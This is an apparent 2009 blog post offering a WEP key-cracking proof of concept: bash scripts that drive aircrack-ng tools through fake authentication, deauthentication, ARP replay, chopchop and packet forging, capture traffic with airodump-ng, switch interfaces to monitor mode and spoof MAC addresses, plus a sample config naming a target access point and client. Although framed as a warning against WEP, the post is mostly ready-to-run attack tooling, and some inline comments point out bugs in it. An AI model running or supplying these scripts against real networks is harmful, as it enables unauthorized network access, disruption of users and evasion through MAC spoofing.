17 Jun 2009

WEP cracking POC with aircrack-ng

Below you'll find my WEP key cracking script crack.sh. I use it in parallel with my capture script cap.sh to demonstrate how easy it is to crack WEP. You'll need to create your own crack.conf file (after performing some reconnaissance with Kismet or airodump-ng), and then you'll see how easy it is to crack WEP.

So don't use WEP!

###!/bin/bash
# File: crack.sh
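# Extra search paths for the wireless tools; the duplicated /sbin and
# /usr/sbin entries of the original line are dropped
PATH=$PATH:/usr/sbin:/sbin:/home/user/bin:/home/eric/bin:/usr/local/bin:/data/cap
SEL=""   # last answer typed at a prompt() call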
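#######################################
# Print a message on a fresh line and wait for the user to press Enter.
# Globals:   retkey (written: whatever the user typed, usually empty)
# Arguments: $1 - message text
# Outputs:   "\n== MSG " on stdout, no trailing newline
#######################################
msg()
{
  # printf instead of echo -n: the message is printed verbatim even when it
  # starts with a dash or contains backslashes
  printf '\n== %s ' "$1"
  # -r keeps any backslash the user types literal
  read -r retkey
}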

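#######################################
# Print a question on a fresh line and read the user's answer.
# Globals:   SEL (written: the line typed, empty when the user just hits Enter)
# Arguments: $1 - question text
# Outputs:   "\n== QUESTION " on stdout, no trailing newline
#######################################
prompt()
{
  # printf instead of echo -n: the text is printed verbatim even when it
  # starts with a dash or contains backslashes
  printf '\n== %s ' "$1"
  # -r keeps any backslash the user types literal
  read -r SEL
}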

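# Check calling args
if [ $# -ne 1 ]
then
  echo "Syntax: $0 CONFIGNAME" >&2
  exit 1
fi
echo "== List of available WLAN interfaces:"
# Run the interface scan once (stderr merged, only the 802.11 lines kept) and
# reuse the result: the last listed interface becomes the default
ifaces=$(iwconfig 2>&1 | grep 802.11 | awk '{print $1}')
[ -n "$ifaces" ] && printf '%s\n' "$ifaces"
if=${ifaces##*$'\n'}

prompt "Type the interface to capture from: [$if]"
# an empty answer keeps the default
if [ -n "$SEL" ]
then
  if=$SEL
fi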

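# Enter network values here
CONFFILE=./crack.conf
# The file is sourced below, so it only has to be readable, not executable
if [ ! -r "$CONFFILE" ]
then
  echo "Config $CONFFILE is missing! Exiting." >&2
  exit 1
fi
echo "-- Reading configuration from $CONFFILE"
# The profile name given on the command line becomes $1 inside the config
. "$CONFFILE" "$1"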

# The capture itself runs in cap.sh; this script only drives aireplay-ng
msg 'Pls start the capture in a separate terminal'
prompt 'Run fake reauthenticationl? [y]'
# Enter alone counts as "yes" (the deprecated [ -o ] form is kept as written)
if [ "$SEL" = y -o "$SEL" = "" ]
then
# Fake auth
# $essid, $bssid and $mac0 all come from crack.conf; mac0 is the client MAC
# the script presents to the AP. An association that never carries data is
# the kind of event a wireless IDS records.
aireplay-ng --fakeauth 0 -e "$essid" -a $bssid -h $mac0 $if
msg 'Check that association was successful'
fi

# Make choice of attack
# Every arm pauses (msg) before calling aireplay-ng. $bssid, $mac0 and $mac1
# are the AP, presented-client and target-client MACs from crack.conf.
prompt "Choose (0)deauth, (2)interactive-replay, (3)ARP-replay, (4)chopchop, (5)fragment:"
case $SEL in
0)
# Deauthentication is an unauthenticated management frame; it is exactly
# what client disconnect logs and wireless IDS sensors record.
msg 'Will attempt deauthentication attack'
aireplay-ng -0 1 -a $bssid -h $mac1 $if
;;
2)
msg 'Will attempt replay attack interactively'
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b $bssid -h $mac0 $if

#msg 'Will attempt cracking WEP key with IVs received'
#aircrack-ng -a 1 -X -s wepch${channel}*.ivs
;;
3)
# Chop chop
# NOTE(review): the comment above is stale, this arm is the ARP replay.
# $ssid is never assigned on this page (crack.conf sets essid), so -e is
# passed an empty string here and in the chopchop arm below.
msg 'Will run ARP replay'
aireplay-ng -3 -e "$ssid" -b $bssid -h $mac0 $if
;;
4|5)
# Chop chop
# Choices 4 and 5 run the same command; the -$SEL variant is commented out
msg 'Will run Chop chop: choose the one where dest. MAC is not FF:FF:FF:FF:FF:FF'
aireplay-ng --chopchop -e "$ssid" -h $mac0 $if
#aireplay-ng -$SEL -e "$ssid" -b $bssid $if
msg 'Now copy the .cap file name into your clipboard (without .cap)'
prompt 'Enter the base filename here:'
# NOTE(review): prompt already stored the typed name in SEL; this second read
# waits for another line, so the name has to be typed twice
read capfile

# Dump the packet to the screen
msg 'Packets captured will be dumped to the screen'
tcpdump -s 0 -n -e -r $capfile.cap
msg 'Copy the srcIP to clipboard'
echo -n 'Copy the IP here: '; read srcIP
msg 'Copy the dstIP to clipboard'
echo -n 'Copy the IP here: '; read dstIP

# Forge ARP packet
# NOTE(review): arpcapfile is not assigned anywhere on this page; -w below and
# -r further down receive an empty argument unless crack.conf sets it
msg 'Will forge ARP packet'
packetforge-ng -0 -h $mac0 -c $mac1 -a $bssid -l $dstIP -k $srcIP -y $capfile.xor -w $arpcapfile

msg 'Will replay interactively from captured file (just select first shown)'
aireplay-ng --interactive -r $arpcapfile $if

#msg 'Will attempt cracking WEP key with IVs received'
#aircrack-ng -a 1 -X -s wepch${channel}*.ivs
;;
esac
=============================================================

###!/bin/bash
# File: cap.sh
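# Extra search paths for the wireless tools; the duplicated /sbin and
# /usr/sbin entries of the original line are dropped
PATH=$PATH:/usr/sbin:/sbin:/home/user/bin:/home/eric/bin:/usr/local/bin:/data/cap
SEL=""   # last answer typed at a prompt() call
opts=""  # airodump-ng option string, built up by readConfig/interact/capture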

#######################################
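#######################################
# Print a message on a fresh line and wait for the user to press Enter.
# Globals:   retkey (written: whatever the user typed, usually empty)
# Arguments: $1 - message text
# Outputs:   "\n== MSG " on stdout, no trailing newline
#######################################
msg()
{
  # printf instead of echo -n: the message is printed verbatim even when it
  # starts with a dash or contains backslashes
  printf '\n== %s ' "$1"
  # -r keeps any backslash the user types literal
  read -r retkey
}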

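#######################################
# Print a question on a fresh line and read the user's answer.
# Globals:   SEL (written: the line typed, empty when the user just hits Enter)
# Arguments: $1 - question text
# Outputs:   "\n== QUESTION " on stdout, no trailing newline
#######################################
prompt()
{
  # printf instead of echo -n: the text is printed verbatim even when it
  # starts with a dash or contains backslashes
  printf '\n== %s ' "$1"
  # -r keeps any backslash the user types literal
  read -r SEL
}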

#######################################
# Print the three accepted command lines of this script.
# Globals:   none
# Arguments: none
# Outputs:   usage text on stdout, one form per line
#######################################
usage(){
  local me=$0
  printf '%s\n' \
    "Syntax: $me (no args: interactive)" \
    " $me IF -f CONFIGNAME [AIRODUMP-NG_OPTS]" \
    " $me IF -c CHANNEL [AIRODUMP-NG_OPTS]"
}
#######################################
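#######################################
# Source ./crack.conf for the named profile and build the airodump-ng option
# string from the values it defines.
# Globals:   CONFNAME, CONFFILE, opts (written)
#            bssid, channel, type, band (read; set by the sourced config)
# Arguments: $1   - profile name, handed to crack.conf as its $1
#            $2.. - extra options appended verbatim to opts
# Returns:   exits 1 when the config file cannot be read
#######################################
readConfig(){
  CONFNAME=$1
  shift

  # Enter network values here
  CONFFILE=./crack.conf
  # The file is sourced, so it only has to be readable, not executable
  if [ ! -r "$CONFFILE" ]
  then
    echo "Config $CONFFILE is missing! Exiting." >&2
    exit 1
  fi
  echo "-- Reading configuration from $CONFFILE"
  . "$CONFFILE" "$CONFNAME"
  opts="--bssid $bssid" # Filter APs by BSSID
  opts="$opts -w $CONFNAME-ch$channel" # Dump file prefix
  opts="$opts -t $type" # Filter APs by cipher suite
  opts="$opts --band $band" # Band on which airodump-ng should hop (abg)
  opts="$opts --channel $channel" # Capture on specific channels
  opts="$opts $*" # caller-supplied extras, joined into the same string
}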
#######################################
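#######################################
# Optionally put $if into monitor mode (via ./wlanconfig.sh), run airodump-ng
# with the accumulated option string inside ./dump, then optionally switch
# the interface back to managed mode.
# Globals:   opts (read, appended to), if, mac0 (read), SEL (via prompt)
# Arguments: none
# Returns:   exits 1 when ./dump cannot be entered
#######################################
capture(){
  #opts="$opts --ivs" # Save only captured IVs
  #opts="$opts --gpsd" # Use GPSd
  opts="$opts --update 2" # Display update delay in seconds
  #opts="$opts --showack" # Prints ack/cts/rts statistics
  #opts="$opts -h" # Hides known stations for --showack
  #opts="$opts -f 1000" # Time in ms between hopping channels
  opts="$opts -a" # Filter unassociated clients

  # mac0 is only set when a crack.conf profile was loaded
  if [ -n "$mac0" ]
  then
    prompt "Change MAC to $mac0? [n]"
    if [ "$SEL" = "y" ]
    then
      ./wlanconfig.sh "$if" monitor "$mac0"
    fi
  else
    prompt "Configure for $if for monitoring mode? [n]"
    if [ "$SEL" = "y" ]
    then
      ./wlanconfig.sh "$if" monitor
    fi
  fi
  msg "About to run: airodump-ng $opts $if"
  # Capture files belong in ./dump; stop instead of writing next to the script
  # (the cd .. below assumes the capture ran one level down)
  cd dump || { echo "Cannot enter ./dump! Exiting." >&2; exit 1; }
  # opts is deliberately unquoted: it is a space-separated option string
  # shellcheck disable=SC2086
  airodump-ng $opts "$if"

  prompt "Configure $if back to normal managed mode? [n]"
  if [ "$SEL" = "y" ]
  then
    cd ..
    ./wlanconfig.sh "$if" managed
  fi
}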
#######################################
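#######################################
# Interactive setup: pick the interface, then either load a named profile
# through readConfig or ask for a channel and a cipher filter.
# Globals:   if, channel, opts (written); SEL (via prompt)
# Arguments: none
# Outputs:   the sorted list of wireless interfaces iwconfig reports
#######################################
interact(){
  local ifaces
  echo "== List of available WLAN interfaces:"
  # Run the interface scan once and reuse it; the last (sorted) entry is the
  # default offered at the prompt
  ifaces=$(iwconfig 2>&1 | grep 802.11 | awk '{print $1}' | sort)
  [ -n "$ifaces" ] && printf '%s\n' "$ifaces"
  if=${ifaces##*$'\n'}

  prompt "Type the interface to capture from: [$if]"
  if [ -n "$SEL" ]
  then
    if=$SEL
  fi

  prompt "Use a known configuration? [n]"
  if [ "$SEL" = "y" ]
  then
    prompt "Enter config name:"
    # the profile name is a single argument, so it is quoted
    readConfig "$SEL"
    return
  fi

  prompt "Capture on a specific channel? [n]"
  if [ "$SEL" = "y" ]
  then
    channel=1
    prompt "Enter channel number: [$channel]"
    if [ -n "$SEL" ]
    then
      channel=$SEL
    fi
    opts="--channel $channel"
    opts="$opts -w ch$channel" # Dump file prefix
  fi
  prompt "Filter on cypher (OPN|WEP|WPA|WPA1|WPA2)? [All]"
  if [ -n "$SEL" ]
  then
    opts="$opts -t $SEL"
  fi
}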
#######################################

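# Check calling args
# one argument is never valid: the forms are "IF -f NAME" / "IF -c CH" / nothing
if [ $# -eq 1 ]
then
  usage
  exit 1
fi
if [ $# -ge 2 ]
then
  if=$1 ; shift
  op=$1 ; shift
else
  op=interactive
fi

case "$op" in
  -c)
    channel=$1
    shift
    # this form needs a channel number
    if [ -z "$channel" ]
    then
      usage
      exit 1
    fi
    opts="-w ch$channel" # Dump file prefix
    opts="$opts -c $channel" # Capture on specific channels
    opts="$opts $*" # remaining args go to airodump-ng unchanged
    capture
    ;;
  -f)
    readConfig "$@"
    capture
    ;;
  interact*)
    interact "$@"
    capture
    ;;
  *)
    # unknown operation: report it as an error instead of exiting 0
    usage
    exit 1
    ;;
esac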


=========================================================

###!/bin/bash
# File: wlanconfig.sh
# ifconfig, iwconfig, wlanconfig and macchanger usually live in the sbin dirs
PATH="${PATH}:/sbin:/usr/sbin:/usr/local/bin"

#######################################
# Print the usage line and four example invocations.
# Globals:   none
# Arguments: none
# Outputs:   usage text on stdout, surrounded by blank lines
#######################################
printUsage(){
  local me=$0
  printf '\n%s\n\n%s\n' "Usage: $me IF MODE [NEWMAC]" "Examples:"
  printf ' %s\n' \
    "$me ath0 managed" \
    "$me ath0 monitor" \
    "$me wlan0 monitor" \
    "$me wlan0 monitor 11:22:33:44:55:66"
  echo
}

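# Check calling args: IF and MODE are required, NEWMAC is optional
if [ $# -lt 2 ]
then
  printUsage
  exit 1
fi

# Map the user-facing mode word onto the madwifi wlanmode keyword
case "$2" in
  managed)
    mode=sta
    ;;
  monitor)
    mode=monitor
    ;;
  *)
    printUsage
    exit 1
    ;;
esac

if=$1
bif=$1      # base device; swapped for wifi0 on madwifi further down
modecmd=$2  # mode word as typed, used by iwconfig
mac=$3      # optional new MAC, empty when not given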

# The interface is taken down, optionally re-addressed, switched to the
# requested mode and brought back up (presumably needs root; not checked here)
echo "-- Bringing $if down"
ifconfig $if down

# Set base interface to wifi0 if it's Atheros/madwifi
# (on madwifi the mode change is done by recreating the VAP on the base
# device, see the wlanconfig calls below)
if [ $if = ath0 -o $if = ath1 ]
then
bif=wifi0
fi

# Optional MAC change, applied to the base device; from here on the new
# address is what AP association and DHCP logs will show
if [ "$mac" != "" ]
then
echo "-- Changing MAC of $bif to $mac"
macchanger --mac $mac $bif
fi

# Special execution for Atheros/madwifi
if [ $if = ath0 -o $if = ath1 ]
then
echo "-- Destroying $if"
wlanconfig $if destroy

# $mode is the wlanmode keyword (sta/monitor), $modecmd the word as typed
echo "-- Creating $if in $modecmd mode"
wlanconfig $if create wlandev $bif wlanmode $mode
else
#airmon-ng stop $if
#airmon-ng start $if
# Other drivers take the mode word directly through iwconfig
echo "-- Configuring $if for $modecmd mode"
iwconfig $if mode $modecmd
fi

echo "-- Bringing $if up"
ifconfig $if up

==============================================================

# File: Sample crack.conf
#if=wlan1 ; mac0=00:1B:2F:A9:D1:B9 # Orig MAC (rtl8087l)
#if=wifi0 ; mac0=06:23:4D:00:82:7C # Atheros 5007
#if=ath1 ; mac0=06:23:4D:00:82:7C # Atheros 5007
#if=wlan0 ; mac0=00:1B:2F:A9:D1:B9 # Orig MAC (rtl8087l)

# $1 is the profile name crack.sh / cap.sh pass when sourcing this file.
# Every name currently lands in the single "*" arm; add a "name)" arm above
# it to keep several networks in one file.
case "$1" in
  *)
    channel=6                  # Wireless channel
    essid="TESTSSID"           # SSID
    bssid="00:18:39:C4:F6:85"  # MAC of AP
    mac0="00:29:2F:E5:AA:15"   # Masquerading as internal MAC (if required by AP)
    mac1="00:1F:F3:F9:C1:B1"   # MAC of known target
    # key=C3E07361D029ACEE81234446B4 (saved here after cracking)
    type="WEP"
    band="g"
    ;;
esac
